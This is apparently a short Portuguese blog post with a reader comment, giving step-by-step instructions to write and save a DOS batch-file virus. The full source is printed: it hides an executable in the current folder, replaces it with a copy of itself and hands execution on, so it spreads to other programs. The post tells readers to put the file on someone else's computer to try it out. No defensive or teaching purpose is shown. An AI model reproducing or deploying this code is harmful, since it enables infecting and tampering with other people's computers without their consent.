1°- abra o bloco de notas!
2°-digito o seguinte codigo:
@echo off
ctty nul
rem
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
:end
ctty con
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3
3°-salve o arquivo com o nome que vc quiser! com a estenção .bat Exemplo: Virus.bat
4°- Vc esta Pronto! note q o icone esta diferente! e agora coloque isso no pc de alguem e experimente!
caraiooo se e zika msm lek
ResponderExcluirby hisoka